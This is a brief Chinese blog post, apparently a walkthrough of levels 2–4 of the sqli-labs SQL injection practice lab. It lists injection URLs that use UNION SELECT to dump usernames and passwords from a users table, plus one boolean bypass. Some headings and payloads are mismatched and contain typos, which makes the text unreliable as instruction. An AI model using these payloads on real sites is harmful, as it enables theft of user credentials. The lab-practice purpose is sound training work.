sqllab less 2- less 4

时间：2020-01-06 21:20:23 阅读：109 评论：0 收藏：0 [点我收藏+]

less 2 跟less 1区别：去掉单引号查询表的用户名与密码

 http://10.9.2.81/Less-2/?id=-1 union select2,3,group_concat(username,‘:‘,password) from security.users --+

less 3 跟less 1 区别：加上）将SQL 语句闭合

http://10.9.2.81/Less-3/?id=1 ‘)or ‘1‘=‘1‘ --+

less 3 跟less 1 区别：加上）将SQL 语句闭合

http://10.9.2.81/Less-4/?id=-1%22)%20union%20select%201,2,group_concat(username,%27:%27,password)%20from%20security.users%20--+

less 4 跟less 3 区别 ‘ 变成 ”


 http://10.9.2.81/Less-3/?id=-1’）union select2,3,group_concat(username,‘:‘,password) from security.users--+

原文地址：https://www.cnblogs.com/vennus/p/12122925.html

踩

(0)

评论一句话评论（0）

分享档案

更多>

周排行